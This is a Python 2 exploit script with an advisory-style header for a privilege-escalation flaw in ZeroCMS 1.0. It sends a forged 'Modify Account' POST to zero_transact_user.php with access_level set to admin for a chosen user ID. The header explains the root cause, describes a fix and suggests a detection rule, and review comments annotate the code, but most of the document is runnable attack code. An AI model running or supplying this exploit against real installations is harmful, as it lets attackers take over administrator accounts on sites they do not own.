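# ZeroCMS 1.0 - zero_transact_user.php
# Improper form POST handling (parameter pollution)
# Vendor: Another Awesome Stuff
# Product web page: http://www.aas9.in/zerocms/
# Author: tiago.alexand@gmail.com
# OSVDB ID: 108025
#
# Summary: ZeroCMS is a very simple Content Management System built using
# PHP and MySQL.
#
# Description: the script zero_transact_user.php contains a "Modify Account"
# case whose execution context does not take the current user's permissions
# into consideration, allowing a malicious user to escalate their privileges
# to admin.
#
# Root cause and fix: the handler trusts two client-supplied fields, `user_id`
# and `access_level`. A corrected handler derives the target account from the
# authenticated session instead of the request body, and honours an
# `access_level` value only when the session already belongs to an
# administrator.
# Detection (assumption, confirm against the application): the account form
# shown to ordinary users presumably does not submit `access_level`, so a
# "Modify Account" POST that carries it from a non-admin session is worth
# alerting on.
#
# Python 2 only (cookielib / urllib2). The published listing was collapsed
# onto one line and had lost the `email` identifier and the `print` keyword;
# both are restored below.
import sys
import getopt
import cookielib
import urllib2
import urllib

USAGE = 'zero_cms_privEscalation.py -u <host> -m <email> -n <account name> -i acount id'


def exploit(host, email, name, userid):
    """Send the "Modify Account" form post described in the header.

    host   -- base URL of the ZeroCMS installation
    email  -- value sent as the `email` form field
    name   -- value sent as the `name` form field
    userid -- value sent as the `user_id` form field

    Returns None; the response body is read and discarded.
    """
    access_level = 3  # default for admin
    # The script that handles user related actions.
    url = host + '/zero_transact_user.php'
    args = {
        'user_id': userid,
        'email': email,
        'name': name,
        # The field the server should never accept from a non-admin session.
        'access_level': access_level,
        'action': 'Modify Account',
    }
    data = urllib.urlencode(args)
    # NOTE(review): the cookie jar is empty when the request is made, so as
    # written no session cookie accompanies the post. Whether the endpoint
    # accepts that is not shown here; a fixed handler must require an
    # authenticated session before reaching the "Modify Account" case.
    cj = cookielib.CookieJar()
    opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
    response = opener.open(url, data)
    response.read()


def main(argv):
    """Parse -u/-m/-n/-i from argv and pass them to exploit().

    Prints the usage line and exits with status 2 on a getopt error, or with
    status 0 when -h is given.
    """
    host = ''
    email = ''
    accountname = ''
    userid = ''
    try:
        opts, args = getopt.getopt(argv, "hu:m:n:i:")
    except getopt.GetoptError:
        print(USAGE)
        sys.exit(2)
    for opt, arg in opts:
        # Plain equality: the listing's `opt in ("-u")` is a substring test
        # against a string, not tuple membership.
        if opt == '-h':
            print(USAGE)
            sys.exit()
        elif opt == "-u":
            host = arg
        elif opt == "-m":
            email = arg
        elif opt == "-n":
            accountname = arg
        elif opt == "-i":
            userid = arg
    exploit(host, email, accountname, userid)


if __name__ == "__main__":
    main(sys.argv[1:])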